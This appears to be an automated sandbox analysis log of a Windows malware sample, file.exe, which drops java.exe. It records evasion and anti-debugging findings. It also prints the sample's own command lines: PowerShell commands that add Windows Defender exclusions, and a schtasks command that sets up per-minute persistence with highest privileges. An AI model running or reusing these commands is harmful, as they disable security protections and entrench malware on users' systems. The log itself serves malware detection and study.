                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: file.exe, java.exe.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1A990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 1A610000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 1030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 1A2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exeMemory allocated: 1A9C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 766Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9081Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6041Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3751Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7809Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1689Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5819Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3774Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7064
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2471
                      Source: C:\Users\user\Desktop\file.exe TID: 1016Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3404Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 7809 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep count: 1689 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 380Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 880Thread sleep count: 7064 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436Thread sleep count: 2471 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 5768Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 6780Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 1112Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 4892Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\java.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exeThread delayed: delay time: 922337203685477
                      Source: java.exe.0.drBinary or memory string: vmware
                      Source: svchost.exe, 0000000C.00000002.3404879630.0000014D50A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3403481208.0000014D4B42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: file.exe, 00000000.00000002.3417338709.000000001B833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD34817A8B CheckRemoteDebuggerPresent,0_2_00007FFD34817A8B
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\java.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
